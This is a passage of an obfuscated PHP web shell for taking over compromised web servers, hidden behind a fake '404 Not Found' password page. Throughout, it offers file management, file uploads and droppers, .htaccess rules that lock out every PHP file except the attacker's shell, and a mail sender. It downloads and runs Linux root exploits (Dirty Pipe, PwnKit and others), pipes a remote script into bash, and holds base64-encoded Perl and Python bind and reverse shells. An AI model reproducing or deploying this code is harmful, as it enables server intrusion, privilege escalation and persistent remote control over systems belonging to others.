		\x9\x9<div class='btn-group mb-3'>\xa\x9	\x9\x9	<a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=autoscan'><i class='bi bi-bug'></i> Auto scan</a>\xa\x9				<a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=scansd'><i class='bi bi-search'></i> Scan SUID</a>\xa\x9	\x9\x9	<a class='btn btn-outline-light btn-sm' href='" . $_SERVER["REQUEST_URI"] . "&id_two=esg'><i class='bi bi-search'></i> Exploit suggester</a>
\x9\x9\x9\x9</div>
\x9		</div>"; if (!$GLOBALS["fungsi"][5]("proc_open")) { echo "<center class='anu'>Command is Disabled !</center>"; } if (!is_writable($path)) { echo "<center class='anu'>Current Directory is Unwriteable !</center>"; } if (isset($_GET["id_two"]) && $_GET["id_two"] == "autoscan") { if (!file_exists($path . "/rooting/")) { mkdir($path . "/rooting"); exe_root("wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz", $path . "/rooting"); exe_root("tar -xf auto.tar.gz", $path . "/rooting"); if (!file_exists($path . "/rooting/netfilter")) { die("<center class='anu'>Failed to Download Material !</center>"); } } echo "\xa\x9	\x9	<div class="container-fluid language-javascript">
\x9\x9	\x9	<div class="shell mb-3">
\x9	\x9		\x9<pre style="font-size:10px;"><code>Netfilter : " . exe_root("timeout 10 ./rooting/netfilter", $path) . "Ptrace : " . exe_root("echo id | timeout 10 ./rooting/ptrace", $path) . "Sequoia : " . exe_root("timeout 10 ./rooting/sequoia", $path) . "OverlayFS : " . exe_root("echo id | timeout 10 ./overlayfs", $path . "/rooting") . "Dirtypipe : " . exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $path) . "Sudo : " . exe_root("echo 12345 | timeout 10 sudoedit -s Y", $path) . "Pwnkit : " . exe_root("echo id | timeout 10 ./pwnkit", $path . "/rooting") . @exe("rm -rf ./rooting | timeout 10 ") . "</code></pre>\xa	\x9\x9	\x9</div>
	\x9\x9	</div>"; } elseif (isset($_GET["id_two"]) && $_GET["id_two"] == "scansd") { echo "<center class="anu">[+] Scanning ...</center>"; echo "\xa	\x9	\x9<div class="container-fluid language-javascript">
\x9\x9	\x9	<div class="shell mb-3">\xa\x9\x9	\x9\x9\x9<pre style="font-size:10px;"><code>" . exe_root("find / -perm -u=s -type f 2>/dev/null", $path) . "</code></pre>
\x9		\x9	</div>
\x9\x9\x9	</div>"; } elseif (isset($_GET["id_two"]) && $_GET["id_two"] == "esg") { echo "<center class="anu">[+] Loading ...</center>"; echo "
\x9			<div class="container-fluid language-javascript">
				\x9<div class="shell mb-3">\xa		\x9			<pre style="font-size:10px;"><code>" . exe_root("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $path) . "</code></pre>
\x9\x9\x9\x9	</div>
\x9			</div>"; } } goto pY6gl; WkiLV: tiJmV: goto YMAqF; cKSrB: Q8Vdd: goto ne7no; Lwfik: @ini_set("output_buffering", 0); goto G14V6; J7ByC: QLr2x: goto ZNsnh; k4sSD: for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unhex($Array[$i]); } goto Iu50C; PoI1u: $location_api_url = "http://ip-api.com/json/{$ip_public}"; goto iL_4F; J7c2r: C9DqF: goto xk9iT; MBmU1: date_default_timezone_set("Asia/Jakarta"); goto osASh; hYe9r: goto HdaTq; goto g4QUG; yd57J: aKeCl: goto eWOz0; p_X1N: goto kfJtT; goto VcPEY; FmZMv: function p($file) { $p = fileperms($file); if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto osP09; z1UDJ: IP7wT: goto xA8V1; PyOJP: if ($_7["id"] == "createhates") { s(); if (isset($_7["bikin"])) { $selectedContent = isset($_7["content"]) ? $_7["content"] : ''; $isiFile = ''; $namafile = isset($_POST["namafile"]) ? $_POST["namafile"] : ''; if ($selectedContent == "content1") { $isiFile = "<Files ~ '\.(xml|css|jpe?g|png|gif|js|pdf|phtml|html|shtml|php5|php)$'>
Allow from all\xa</Files>"; } elseif ($selectedContent == "content2") { $isiFile = "<FilesMatch '.*\.(phtml|php|PhP|php5|suspected)$'>
Order Allow,Deny\xaDeny from all\xa</FilesMatch>
<FilesMatch '^({$namafile})$'>\xaOrder Allow,Deny\xaAllow from all\xa</FilesMatch>"; } $setNama = ".htaccess"; $result = file_put_contents($setNama, $isiFile); chmod($setNama, 292); if ($result !== false) { echo "<strong>Create file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } echo "<div class='mb-3'>
\x9\x9\x9<u>Defense Shell</u>
		\x9<form method='POST' id='defenseShellForm'>\xa\x9	\x9\x9<input type='hidden' name='createhates' value='1'>
\x9		\x9<div class='d-grid gap-2'>
		\x9\x9\x9<label><input type='radio' name='content' value='content1' checked onclick='toggleShellNameInput(false)'> htaccess Allow All</label>\xa\x9		\x9\x9<label><input type='radio' name='content' value='content2' onclick='toggleShellNameInput(true)'> htaccess Only Allow Your Shell(enter name shell before create!!)</label>
		\x9\x9	<label>use | if you have 2 files</label>\xa	\x9\x9	\x9<label>example:</label>\xa	\x9\x9	\x9<label><strong>index.php|indeex.php</strong> / <strong>aa.php|bb.php|cc.php</strong></label>
\x9		\x9\x9<label id='namafile' for='namafile'>Shell Name: <input class='form-control form-control-sm' type='text' name='namafile'></label>
	\x9			<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='create'>
	\x9		</div>
		\x9</form>\xa\x9\x9</div>"; } goto T6cfq; PpvmR: goto McCnR; goto A8SxU; O2TiW: goto qmsSx; goto EvKXK; Mq334: foreach ($scand as $dir) { $dt = date("d-m-Y G:i", filemtime("{$path}/{$dir}")); if (strlen($dir) > 50) { $_d = substr($dir, 0, 50) . "..."; } else { $_d = $dir; } if ($GLOBALS["fungsi"][5]("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner("{$path}/{$dir}")); $downer = $downer["name"]; } else { $downer = fileowner("{$path}/{$dir}"); } if ($GLOBALS["fungsi"][5]("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup("{$path}/{$dir}")); $dgrp = $dgrp["name"]; } else { $dgrp = filegroup("{$path}/{$dir}"); } if (!$fungsi[1]($path . "/" . $file)) { continue; } $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } if (!$fungsi[1]($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "
	\x9<tr>
\x9\x9\x9<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href='?path=" . hex($path . "/" . $dir) . "'>{$_d}</a></td>
			<td class='text-center'>dir</td>\xa	\x9	<td class='text-center'>{$dt}</td>\xa\x9		<td class='text-center'>-</td>
\x9	\x9<td class='text-center'>{$downer}<gr>/</gr>{$dgrp}</td>
			<td class='text-center'>"; if (is_writable($path . "/" . $dir)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $dir)) { echo "<rd>"; } echo p($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font></center></td>"; } echo "
\x9\x9	<td class='text-center'>\xa\x9		<div class='btn-group'>\xa	\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa\x9		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>
			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=touch_folder'><i class='bi bi-calendar'></i></a>
			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($path . "/" . $dir) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa	\x9\x9</div>
\x9\x9	</td>\xa\x9	</tr>"; } goto PpvmR; IwR8N: goto h1v9W; goto b0Htz; K44qW: goto Nwx3I; goto zN3tu; uba3F: goto ZT_p6; goto UGrJ2; zSsTm: ZW3j1: goto wiQif; nwFWT: n0uKs: goto Ihp18; yhECU: goto IAa_h; goto yd57J; wdhOZ: goto T2So2; goto awheV; IIg7D: goto M9jb2; goto M_Q9a; Fmqk5: sWyZ2: goto deg8m; tdhtT: goto GIn5m; goto CLzcZ; qK5rB: $user_agent = $_SERVER["HTTP_USER_AGENT"]; goto upcq7; FEUrJ: ini_set("memory_limit", "64M"); goto Dc2M6; jD26d: $telegramApiUrl = "https://api.telegram.org/bot{$botToken}/sendMessage?chat_id={$chatId}&text=" . urlencode($pesan_alert); goto Mdw2u; EhW21: goto KmDAz; goto NZN8n; uLPNS: $gcc = exe("gcc --version") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto jHBVA; q2iNw: @ini_set("output_buffering", 0); goto PlOXp; anA6j: $rib = "http://ip-api.com/json/{$yip}?fields=city"; goto kza90; ezQTk: Rc_RS: goto EfMKN; cOq2q: goto QLr2x; goto bVyWm; k4dIj: zuGew: goto rRCxU; pX8l8: goto pKOtz; goto ljtbs; sC6rm: goto MSTMF; goto AQRwe; qAMhz: goto svZje; goto cNchv; qepCq: yNm8G: goto fVC7V; XGHY4: goto H3mcr; goto UZCd7; zZOvt: sQCPs: goto Lwfik; YZcLH: M3BqJ: goto xcEQS; g85JD: nGILA: goto nxYqg; eavUF: goto Sif0P; goto V13AP; CC7Pb: goto VDEd5; goto QwB_l; rRCxU: if (isset($_7["opn"])) { $file = $_7["opn"]; } goto m_lQ1; EvKXK: wX0Yb: goto D2W59; c6a2h: goto Q8Vdd; goto gCrHD; gCrHD: EXmJN: goto oSuaD; nHank: if ($_7["id"] == "createuploader") { s(); if (isset($_7["bikin"])) { $selectedContent = isset($_7["content"]) ? $_7["content"] : ''; $isiFile = ''; if ($selectedContent == "content1") { $isiFile = "<?php \xa\x9		\x9\x9	ini_set("upload_max_filesize", "100M"); 
			\x9\x9	ini_set("post_max_size", "100M"); \xa				\x9	$status = "Error Masse"; \xa\x9		\x9	\x9$cwd = getcwd(); \xa		\x9\x9\x9\x9$leader = $_FILES["ribel"]["size"]; 
		\x9\x9	\x9$imam = $_FILES["ribel"]["type"]; 
\x9\x9				$ribel = $_FILES["ribel"]["name"]; 
	\x9		\x9	$status = ""; 
\x9		\x9		if ($ribel != "") { 
					\x9	$cyber = $ribel; 
	\x9	\x9	\x9\x9if (copy($_FILES["ribel"]["tmp_name"], $cyber)) { 	\xa	\x9\x9	\x9\x9	\x9$status = "File Berhasil Diupload Masse: <br>" . $cwd . "/" . $ribel; 
	\x9\x9	\x9\x9	} else { 	\xa		\x9\x9\x9		\x9$status = "Terjadi Kesalahan Saat Mengupload File Masse"; \x9
\x9\x9\x9			\x9} 
	\x9		\x9\x9} else { 	\xa	\x9	\x9		\x9$status = "Silahkan Pilih Filenya Dulu Masse"; \xa\x9	\x9			} 
	\x9\x9	\x9\x9echo $status; \xa			\x9\x9?><html>
\x9\x9\x9		<head>
\x9\x9\x9\x9\x9</head>
\x9\x9\x9	\x9<body>
	\x9\x9\x9	<form action="" method="POST" enctype="multipart/form-data">
					<input type="file" name="ribel">
\x9		\x9	<input type="submit" name="submit" value="Gass Masse">
			\x9	</form>
\x9\x9\x9	\x9</body>
	\x9		\x9</html>"; } elseif ($selectedContent == "content2") { $isiFile = "<?php \xa\x9		\x9\x9\x9if(isset($_GET["ribel"])) {} \xa		\x9		\x9__halt_compiler(); \xa\x9\x9			?>"; } $setNama = "upload.php"; $result = file_put_contents($setNama, $isiFile); if ($result !== false) { chmod($setNama, 511); echo "<strong>Create file</strong> ok! <a href="" . $setNama . "?ribel">Click Here!</a> " . ok() . "</div>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } echo "<div class="mb-3">
	\x9\x9\x9<u>Create Uploader</u>\xa\x9\x9	\x9<form method="POST" id="defenseShellForm">\xa\x9	\x9\x9	<input type="hidden" name="createhates" value="1">
		\x9\x9	<div class="d-grid gap-2">
	\x9\x9		\x9<label><input type="radio" name="content" value="content1" checked onclick="toggleShellNameInput(false)"> Uploader Anti Delete</label>\xa	\x9	\x9\x9\x9<label><input type="radio" name="content" value="content2" onclick="toggleShellNameInput(true)"> Normal Uploader pass: ?ribel</label>\xa		\x9	\x9\x9<input class="btn btn-outline-light btn-sm" type="submit" name="bikin" value="create">
	\x9\x9	\x9</div>\xa\x9			</form>\xa	\x9\x9</div>"; } goto uBkmK; wjn3q: $location_data = json_decode(file_get_contents($location_api_url), true); goto osecG; b0Htz: WQ2ja: goto TMPU0; gBg7t: gYvHI: goto E26qg; fVC7V: if ($_7["id"] == "phpmailer") { s(); if ($_SERVER["REQUEST_METHOD"] == "POST") { $email_penerima = isset($_POST["email_penerima"]) ? $_POST["email_penerima"] : ''; $subjek = isset($_POST["subjek"]) ? $_POST["subjek"] : ''; $pesan = isset($_POST["pesan"]) ? $_POST["pesan"] : ''; if (filter_var($email_penerima, FILTER_VALIDATE_EMAIL)) { if (@mail($email_penerima, $subjek, $pesan)) { echo "<strong>PHPMailer</strong> Sending! " . ok() . "</div>"; } else { echo "<strong>PHPMailer</strong> failed! " . er() . "</div>"; } } else { echo "<strong>Invalid email address</strong> fail! " . er() . "</div>"; } } echo "\xa			<div class='card card-body text-dark input-group mb-3'>\xa\x9		<u>PHP Mailer</u>\xa\x9	\x9<form method='POST'>\xa\x9\x9\x9	<div class='input-group d-flex gap-2'>\xa	\x9			<label for='email_penerima'>Email Receiver:</label>\xa	\x9	\x9\x9</div>\xa\x9\x9			<div class='input-group'>
				\x9<input class='form-control form-control-sm' type='email' name='email_penerima' placeholder='Enter the Email' value='[email protected]' required>\xa\x9\x9	\x9</div>\xa\x9	\x9\x9<div class='input-group d-flex gap-2'>
		\x9		<label for='subjek'>Subject:</label>
\x9\x9	\x9	</div>\xa\x9\x9	\x9\x9<div class='input-group'>
\x9\x9		\x9<input class='form-control form-control-sm' type='text' name='subjek' placeholder='Enter the Title' value='Hi Admin' required>
\x9\x9		</div>
			\x9<div class='input-group d-flex gap-2'>
	\x9	\x9\x9<label for='pesan'>Message:</label>
\x9	\x9\x9\x9</div>
		\x9\x9	<div class='input-group'>
				\x9<textarea class='form-control btn-sm' rows='7' name='pesan' placeholder='Message'></textarea>
\x9\x9\x9\x9</div>\xa\x9\x9		<div class='d-grid gap-2'>
\x9	\x9\x9	<button type='submit' name='phpmailer' class='btn btn-primary'>Sending</button>
\x9\x9	\x9</div>
	\x9	</form>
\x9	</div>"; } goto O1RqN; O6bjS: aAe5o: goto YDZ81; si1pW: if (isset($_GET["id"]) && $_GET["id"] === "unlockshell") { $newPermissions = 420; changeFilePermissions($filename, $newPermissions); } goto HHFCL; bFGp_: goto gYvHI; goto ugMwL; Pexjf: goto adv1G; goto ZFgRB; bPxnv: goto wX0Yb; goto NcwTG; a61L1: goto aWW6H; goto YZcLH; SLqED: goto PPbbu; goto cKSrB; HJFtS: M9jb2: goto AaGLi; aY1lk: if ($_7["id"] == "network") { s(); echo "\xa		<div class='card text-dark'>\xa\x9		<div class='card-header'>
\x9		\x9<form method='post'>
\x9		\x9	<u>Bind port to /bin/sh [Perl]</u><br>\xa\x9	\x9	\x9<u>Port :</u>
\x9\x9	\x9<div class='input-group'>
\x9			\x9<input class='form-control btn-sm' type='text' name='port' placeholder='6969'>
\x9	\x9		<input class='btn btn-dark btn-sm' type='submit' name='bpl' value='submit'>\xa	\x9		</div>
		\x9<h5>Back-Connect</h5>
\x9	\x9<u>Server :</u>\xa				<input class='form-control btn-sm' type='text' name='server' placeholder='" . $_SERVER["REMOTE_ADDR"] . "'>
	\x9	<u>Port :</u>
\x9	\x9<div class='input-group'>\xa	\x9\x9\x9<input class='form-control btn-sm' type='text' name='port' placeholder='6969'>
			\x9<select class='form-control btn-sm' name='bc'>\xa	\x9\x9	\x9<option value='perl'>perl</option>\xa	\x9\x9		<option value='python'>python</option>\xa\x9			</select>
		\x9</div>
	\x9	<div class='d-grid gap-2'>
				<input class='btn btn-dark btn-sm btn-block' type='submit' value='submit'>
\x9	\x9</div>\xa\x9	</form>"; if ($_7["bpl"]) { $bp = $GLOBALS["fungsi"][6]("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpB29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpBB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpBsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen("bp.pl", "w"); fwrite($brt, $bp); $out = exe("perl bp.pl " . $_7["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out}
" . exe("ps aux | grep bp.pl") . "</pre>"; $GLOBALS["fungsi"][4]("bp.pl"); } if ($_7["bc"] == "perl") { $bc = $GLOBALS["fungsi"][6]("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpBAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen("bc.pl", "w"); fwrite($plbc, $bc); $out = exe("perl bc.pl " . $_7["server"] . " " . $_7["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out}\xa" . exe("ps aux | grep bc.pl") . "</pre>"; $GLOBALS["fungsi"][4]("bc.pl"); } if ($_7["bc"] == "python") { $bc_py = $GLOBALS["fungsi"][6]("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZTBmcRy8B72wuUTN6AKEQ2HtSk48gn5rhpBweWJhY2tjb25uZWN0KCk="); $pbc_py = @fopen("bcpy.py", "w"); fwrite($pbc_py, $bc_py); $out_py = exe("python bcpy.py " . $_7["server"] . " " . $_7["port"]); sleep(1); echo "<pre>{$out_py}\xa" . exe("ps aux | grep bcpy.py") . "</pre>"; $GLOBALS["fungsi"][4]("bcpy.py"); } echo "</div>
\x9\x9\x9</div>\xa	\x9<br/>"; } goto SLqED; pNXU3: lsV5N: goto Xtayd; crGb4: vQdCF: goto I8XLB; c9WMJ: PkFhD: goto H5uEs; Cx1VN: eBqeZ: goto YdWhL; wiQif: @ini_set("max_execution_time", 0); goto Msa02; ifDbP: rPurp: goto QHPqJ; huEAZ: goto D4Dlr; goto aWagg; yPJ0y: goto DB5uf; goto CChkk; jHBVA: goto rGIHh; goto jfWwD; cKh9k: bsBAb: goto zBHc0; S6NOq: ini_set("display_errors", FALSE); goto ptoEg; t_mQ0: if (!isset($_SESSION["forbidden"])) { ?> 
<!doctypehtml><html><head><title>404 Not Found.</title><meta content="noindex, nofollow, noarchive"name="robots"><meta content="#FFFFFF"name="theme color"></head><style>body{background-image:url(#);background-repeat:no-repeat;background-size:cover;background-position:center;height:100vh;margin:0;display:flex;flex-direction:column;justify-content:center;align-items:center;background-color:#fff}h1{color:#fff}img{opacity:.5;width:200px;height:300px}form{text-align:center;margin-top:20px}input[type=password]{padding:5px}input[type=submit]{background-color:#fff;color:#fff;border:none;padding:5px 10px;cursor:pointer}</style><body><form method="post"><input name="pass"required style="border:none"type="password"></form></body></html><?php  die; } goto TTnxI; QKxFT: foreach ($scand as $file) { $ft = date("d-m-Y G:i", filemtime("{$path}/{$file}")); if ($GLOBALS["fungsi"][5]("posix_getpwuid")) { $fowner = @posix_getpwuid(fileowner("{$path}/{$file}")); $fowner = $fowner["name"]; } else { $fowner = fileowner("{$path}/{$file}"); } if ($GLOBALS["fungsi"][5]("posix_getgrgid")) { $fgrp = @posix_getgrgid(filegroup("{$path}/{$file}")); $fgrp = $fgrp["name"]; } else { $fgrp = filegroup("{$path}/{$file}"); } if (!$fungsi[3]($path . "/" . $file)) { continue; } if (strlen($file) > 50) { $_f = substr($file, 0, 50) . "...-." . $ext; } else { $_f = $file; } echo "
	\x9<tr>
	\x9<td><i class='bi bi-file-earmark-text-fill'></i><a class='text-decoration-none text-secondary' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$file}'>{$_f}</a></td>\xa\x9	\x9<td class='text-center'>file</td>\xa\x9\x9	<td class='text-center'>{$ft}</td>
\x9\x9	<td class='text-center'>" . sz(filesize($file)) . "</td>\xa		\x9<td class='text-center'>{$fowner}<gr>/</gr>{$fgrp}</td>\xa			<td class='text-center'>"; if (is_writable($path . "/" . $file)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $file)) { echo "<rd>"; } echo p($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</gr></rd></td>"; } echo "\xa	\x9\x9<td class='text-center'>\xa\x9	\x9<div class='btn-group'>
	\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>
	\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa				<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>
\x9		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>
\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa\x9\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa	\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>\xa			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>\xa			</div>\xa		\x9</td>\xa		</tr>"; } goto pdGjy; fAhFZ: goto sQCPs; goto ak3P1; QHPqJ: function er() { echo "<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto JaGks; jr_tH: goto EXmJN; goto bkUmP; AQRwe: SwU8B: goto axLKv; UGrJ2: Czge0: goto rJiQh; hy3Yx: iYskO: goto SleZJ; ddOT6: @ini_set("display_errors", 0); goto iLBez; iYc1l: hKE8D: goto K0Vz2; iaUZl: ZT39K: goto EvNBJ; E26qg: if ($_7["id"] == "upload") { s(); if (isset($_7["upl"])) { $result = count($_FILES["file"]["name"]); for ($contents = 0; $contents < $result; $contents++) { $namefile = $_FILES["file"]["name"][$contents]; $up = @copy($_FILES["file"]["tmp_name"][$contents], "{$path}/" . $namefile); } if ($result < 2) { if ($up) { echo "<strong>Upload</strong> {$namefile} ok! " . ok() . "</div>"; } else { echo "<strong>Upload</strong> fail! " . er() . "</div>"; } } else { echo "<strong>Upload</strong> {$result} ok! " . ok() . "</div>"; } } echo "
\x9	<div class='card card-body text-dark input-group mb-3'>\xa		<u>Multiple upload</u>
\x9	\x9<form method='POST' enctype='multipart/form-data'>\xa\x9		\x9<div class='input-group'>\xa	\x9\x9\x9	<input class='form-control form-control-sm' type='file' name='file[]' multiple='' {$_r}>\xa	\x9	\x9	<input class='btn btn-dark btn-sm' type='submit' name='upl' value='upload'>
		\x9\x9</div>
		\x9</form>\xa\x9	</div>"; } goto yPJ0y; xA8V1: function exe_root($set, $sad) { $x = "preg_match"; $xx = "2>&1"; if (!$x("/" . $xx . "/i", $set)) { $set = $set . " " . $xx; } $a = $GLOBALS["fungsi"][5]; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; if ($a($b)) { $ps = $b($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pink, $sad); return $d($pink[1]); } else { return "proc_open function is disabled !"; } } goto jr_tH; jGADS: goto Rc_RS; goto AT4g5; yn2Tx: XB8uL: goto ddOT6; NMZxF: goto yNm8G; goto J7c2r; lC6t8: T0L1a: goto S6NOq; UTVEK: kfJtT: goto j0wib; ZuNbg: nWNfK: goto F6gvW; D6fdE: W60P5: goto AfB8N; QbLd2: HdaTq: goto pIeXA; a3uB9: if (isset($_GET["id"]) && $_GET["id"] === "root_folders") { $newFolderPermissions = 493; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo "Permissions changed for all folders in the current directory."; } goto SH3ma; ttsjz: if ($_7["action"] == "unzip_file") { s(); if ($_7["yeahx"]) { $zipFile = $file; $extractTo = $GLOBALS["fungsi"][7](); $zip = new ZipArchive(); if ($zip->open($zipFile) === true) { $zip->extractTo($extractTo); $zip->close(); echo "<strong>Unzip file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Unzip file</strong> fail! " . er() . "</div>"; } } echo "\xa\x9\x9<div class='btn-group mb-3'>
